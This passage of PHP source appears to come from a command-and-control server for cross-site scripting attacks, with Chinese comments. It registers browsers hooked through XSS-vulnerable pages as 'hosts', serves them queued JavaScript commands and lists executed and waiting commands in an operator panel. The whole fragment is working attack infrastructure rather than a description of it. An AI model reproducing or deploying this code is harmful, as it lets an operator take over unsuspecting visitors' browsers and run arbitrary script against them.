header('Content-Type: text/javascript; charset=utf-8');
die("/*null*/");
}
if (strlen($uri[3]) != 50) {
header('Content-Type: text/javascript; charset=utf-8');
die("/*null*/");
}
$sid = $uri[3];
// XSS漏洞页字符串ID
$pmxProj = new pmxProject();
$pmxHost = new pmxHost();
if ($pmxProj->isExistSaltID($saltid) == FALSE) {
header('Content-Type: text/javascript; charset=utf-8');
die("/*null*/");
}
$pid = $pmxProj->getIDbySlatID($saltid);
/**
* 判断是否第一次上线
*/
if ($pmxHost->isExistSaltID($sid) == FALSE) {
$pmxHost->addHost($pid, $sid);
// 添加主机
} else {
$pmxHost->updateHost($sid);
// 更新主机信息
}
$command = $pmxHost->getCommand($sid);
if ($command) {
header('Content-Type: text/javascript; charset=utf-8');
echo $command;
}
if (!pmx_validate_token()) {
die("Token is incorrect.");
}
$type_allow = array("executed", "waiting");
// 允许的类型
$sid = isset($_GET["sid"]) ? $_GET["sid"] : NULL;
$type = isset($_GET["type"]) ? $_GET["type"] : NULL;
$top = isset($_GET["top"]) ? intval($_GET["top"]) : 10;
if ($sid == NULL || $type == NULL) {
json_out(0, "sid or type couldn't be NULL.");
}
if (!in_array($type, $type_allow)) {
json_out(0, "Type is invalid.");
}
$pmxHost = new pmxHost();
if (!$pmxHost->isExistSaltID($sid)) {
json_out(0, "sid is non-existent.");
}
if ($type == "executed") {
$hostExecutedLogs = $pmxHost->getExecutedLogs($sid);
if (!count($hostExecutedLogs) > 0) {
json_out(1, "", "<p><center>Empty</center></p>");
}
$html = "";
$index = 0;
foreach ($hostExecutedLogs as $hostExecutedLogs_item) {
if ($index >= $top) {
break;
}
$index++;
$resp = json_decode($hostExecutedLogs_item['resp'], TRUE);
